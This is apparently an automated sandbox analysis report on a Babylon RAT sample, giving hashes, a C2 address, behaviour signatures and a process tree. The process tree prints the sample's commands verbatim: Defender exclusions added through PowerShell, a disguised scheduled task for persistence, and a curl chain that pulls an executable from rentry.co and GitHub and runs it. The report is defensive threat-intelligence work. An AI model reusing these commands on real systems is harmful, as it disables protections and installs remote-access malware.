Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
26-06-2024 14:24
Static task
static1
Behavioral task
behavioral1
Sample
2024-06-26_4c7afbccecb19ce4ed453f9c65fd36f1_poet-rat_snatch.exe
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
2024-06-26_4c7afbccecb19ce4ed453f9c65fd36f1_poet-rat_snatch.exe
Resource
win10v2004-20240508-en
General
-
Target
2024-06-26_4c7afbccecb19ce4ed453f9c65fd36f1_poet-rat_snatch.exe
-
Size
4.8MB
-
MD5
4c7afbccecb19ce4ed453f9c65fd36f1
-
SHA1
42bea032c04be5ad23ee33209d710365afbaba62
-
SHA256
82d7f059608bbf6bf8112dfaa2cfae570b4fa68aa56f3b48cd3673212fa19c52
-
SHA512
914dd71f49e12d2c3f1928903c4903af0b40d3b50f7e7be313b8923a91bf6b6f544be6b100f8a20c709275612d21a5f898e4b6bb60cc70903f1559606c956d46
-
SSDEEP
49152:1ur1PwvIyeo+j+E5p9vTiOHWdC9hHbxCM5Ems3pQMLxA7y:qVo+jXJzWdC9lXEmBMN3
Malware Config
Extracted
babylonrat
147.185.221.20
Signatures
-
Babylon RAT
Babylon RAT is remote access trojan written in C++.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
resource yara_rule behavioral2/files/0x000700000002354d-70.dat INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3260 powershell.exe 5060 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
pid Process 3100 svc-host.exe 1820 SecurityHealth.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 18 raw.githubusercontent.com 19 raw.githubusercontent.com 29 raw.githubusercontent.com -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C 2024-06-26_4c7afbccecb19ce4ed453f9c65fd36f1_poet-rat_snatch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 2024-06-26_4c7afbccecb19ce4ed453f9c65fd36f1_poet-rat_snatch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 2024-06-26_4c7afbccecb19ce4ed453f9c65fd36f1_poet-rat_snatch.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2376 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3260 powershell.exe 3260 powershell.exe 3100 svc-host.exe 3100 svc-host.exe 5060 powershell.exe 5060 powershell.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe 3100 svc-host.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1820 SecurityHealth.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 3260 powershell.exe Token: SeDebugPrivilege 3100 svc-host.exe Token: SeDebugPrivilege 5060 powershell.exe Token: SeShutdownPrivilege 1820 SecurityHealth.exe Token: SeDebugPrivilege 1820 SecurityHealth.exe Token: SeTcbPrivilege 1820 SecurityHealth.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1820 SecurityHealth.exe -
Suspicious use of WriteProcessMemory 29 IoCs
description pid Process procid_target PID 1896 wrote to memory of 3260 1896 2024-06-26_4c7afbccecb19ce4ed453f9c65fd36f1_poet-rat_snatch.exe 88 PID 1896 wrote to memory of 3260 1896 2024-06-26_4c7afbccecb19ce4ed453f9c65fd36f1_poet-rat_snatch.exe 88 PID 1896 wrote to memory of 3100 1896 2024-06-26_4c7afbccecb19ce4ed453f9c65fd36f1_poet-rat_snatch.exe 90 PID 1896 wrote to memory of 3100 1896 2024-06-26_4c7afbccecb19ce4ed453f9c65fd36f1_poet-rat_snatch.exe 90 PID 1896 wrote to memory of 3100 1896 2024-06-26_4c7afbccecb19ce4ed453f9c65fd36f1_poet-rat_snatch.exe 90 PID 3100 wrote to memory of 5060 3100 svc-host.exe 91 PID 3100 wrote to memory of 5060 3100 svc-host.exe 91 PID 3100 wrote to memory of 5060 3100 svc-host.exe 91 PID 3100 wrote to memory of 2376 3100 svc-host.exe 97 PID 3100 wrote to memory of 2376 3100 svc-host.exe 97 PID 3100 wrote to memory of 2376 3100 svc-host.exe 97 PID 3100 wrote to memory of 2004 3100 svc-host.exe 100 PID 3100 wrote to memory of 2004 3100 svc-host.exe 100 PID 3100 wrote to memory of 2004 3100 svc-host.exe 100 PID 2004 wrote to memory of 3000 2004 cmd.exe 102 PID 2004 wrote to memory of 3000 2004 cmd.exe 102 PID 2004 wrote to memory of 3000 2004 cmd.exe 102 PID 3000 wrote to memory of 1864 3000 cmd.exe 103 PID 3000 wrote to memory of 1864 3000 cmd.exe 103 PID 3000 wrote to memory of 1864 3000 cmd.exe 103 PID 2004 wrote to memory of 3264 2004 cmd.exe 104 PID 2004 wrote to memory of 3264 2004 cmd.exe 104 PID 2004 wrote to memory of 3264 2004 cmd.exe 104 PID 3100 wrote to memory of 3600 3100 svc-host.exe 105 PID 3100 wrote to memory of 3600 3100 svc-host.exe 105 PID 3100 wrote to memory of 3600 3100 svc-host.exe 105 PID 3600 wrote to memory of 1820 3600 cmd.exe 107 PID 3600 wrote to memory of 1820 3600 cmd.exe 107 PID 3600 wrote to memory of 1820 3600 cmd.exe 107
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-06-26_4c7afbccecb19ce4ed453f9c65fd36f1_poet-rat_snatch.exe"C:\Users\Admin\AppData\Local\Temp\2024-06-26_4c7afbccecb19ce4ed453f9c65fd36f1_poet-rat_snatch.exe"1⤵
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath \"$env:programdata\""2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3260
-
-
C:\ProgramData\Microsoft\SvcHost\svc-host.exeC:\ProgramData\Microsoft\SvcHost\svc-host.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3100 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "%programdata%"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5060
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /F /RL HIGHEST /SC ONLOGON /TN "Microsoft\Windows\SvcHost\SvcHost" /TR "cmd.exe /c start \"\" \"^%programdata^%\Microsoft\SvcHost\svc-host.exe\""3⤵
- Scheduled Task/Job: Scheduled Task
PID:2376
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c for /f "delims=" %i in ('curl -s https://rentry.co/o5kpirns/raw') do @curl -o "C:\ProgramData\Microsoft\Security\SecurityHealth.exe" %i 1>nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c curl -s https://rentry.co/o5kpirns/raw4⤵
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\SysWOW64\curl.execurl -s https://rentry.co/o5kpirns/raw5⤵PID:1864
-
-
-
C:\Windows\SysWOW64\curl.execurl -o "C:\ProgramData\Microsoft\Security\SecurityHealth.exe" https://raw.githubusercontent.com/Drelta/test/main/SecurityDiagram.txt4⤵PID:3264
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start "" "C:\ProgramData\Microsoft\Security\SecurityHealth.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:3600 -
C:\ProgramData\Microsoft\Security\SecurityHealth.exe"C:\ProgramData\Microsoft\Security\SecurityHealth.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1820
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4204,i,6166776566165096562,4582328833313060853,262144 --variations-seed-version --mojo-platform-channel-handle=3468 /prefetch:81⤵PID:912
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
733KB
MD573a2ea546c656ceaa289f9221b6a1f59
SHA175ae715e21b6c2d3fb229f566a54518ac044d58b
SHA256fa7ce16aab3ede14a4274600b3787bc66047001264da0cdeb965f231a1fd826f
SHA512260ea61d495af5911080f268402c9be539cb8623418a71602db71e7e9933a80002c5ccaa4c29c78a60b22f0a2e773df46e0bd6f0d9f26e0e050542873e77e3a6
-
Filesize
400KB
MD57d8e36e0658b87c7235d754e8ada2502
SHA14d16fd939eb3ec3ce3a2ad33e0c8154631de582b
SHA2561c71376c691b2802a5809f3e0cf715e4de2611a6008bd40a3c81cecd6c77c365
SHA5124330acd4b9365027c89237ff037529845628faee5b6693612e0f45fe77ae60c7cd68914a129d94d1718d4702a95bfec5d6741e79e896186bf104179d62fafab6
-
Filesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82